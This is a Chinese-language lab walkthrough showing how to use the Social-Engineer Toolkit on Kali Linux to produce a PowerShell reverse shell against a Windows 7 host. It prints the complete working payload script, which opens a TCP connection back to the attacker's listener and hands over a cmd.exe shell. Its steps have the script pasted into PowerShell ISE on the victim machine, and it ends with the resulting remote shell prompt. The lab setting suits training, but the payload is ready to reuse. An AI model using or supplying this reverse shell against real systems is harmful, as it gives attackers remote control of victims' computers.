0x00 攻击原理

• 利用Windows系统的PowerShell功能进行社工。

0x01 注意事项

• 低版本的Windows操作系统无法运行PowerShell。

0x02 攻击拓扑

• Windows 7（10.121.10.172）----------Kali Linux（10.121.10.170）

0x03 攻击步骤

【Step1】

root@kali:~# setoolkit 启动社会工程工具集

[-] New set.config.py file generated on: 2017-08-06 18:19:43.978708
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2017-08-06 18:19:43.978708
[*] SET is using the new config, no need to restart
Please update SET to the latest before submitting any git issues.
 Select from the menu:
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

【Step2】

set> 1 选择1，社会工程学攻击

Please update SET to the latest before submitting any git issues.
 Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules
  99) Return back to the main menu.

【Step3】

set> 9 选择9，PowerShell攻击

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.
   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database
  99) Return to Main Menu

【Step4】

set:powershell> 2 选择2，选择PowerShell反向shell攻击

set> IP address for the payload listener (LHOST): 10.121.10.170
set:powershell> Enter the port for listener [443]:
[*] Rewriting the powershell reverse shell with options
[*] Exporting the powershell stuff to /root/.set/reports/powershell
set> Do you want to start a listener [yes/no]: yes
Listening on 0.0.0.0:443

【Step5】

进入到/root/.set/reports/powershell目录，复制出powershell.reverse.txt的内容。
root@kali:~# cd /root/.set/reports/powershell
root@kali:~/.set/reports/powershell# ls

powershell.reverse.txt

生成反向shell后，可打开powershell.reverse.txt查看里面的内容。
root@kali:~/.set/reports/powershell# cat powershell.reverse.txt

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.121.10.170'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

如下图所示：

【Step6】

打开被攻击机10.121.10.172的windows+R键，输入powershell_ise.exe。

【Step7】

将kali攻击机（10.121.10.170）中的powershell.reverse.txt的内容复制粘贴到10.121.10.172电脑上powersehll_ise.exe中。

【Step8】

点击powershell_ise的运行按钮，可以看见kali出现以下信息。

('Connected by', ('10.121.10.172', 52358))
Enter shell command or quit: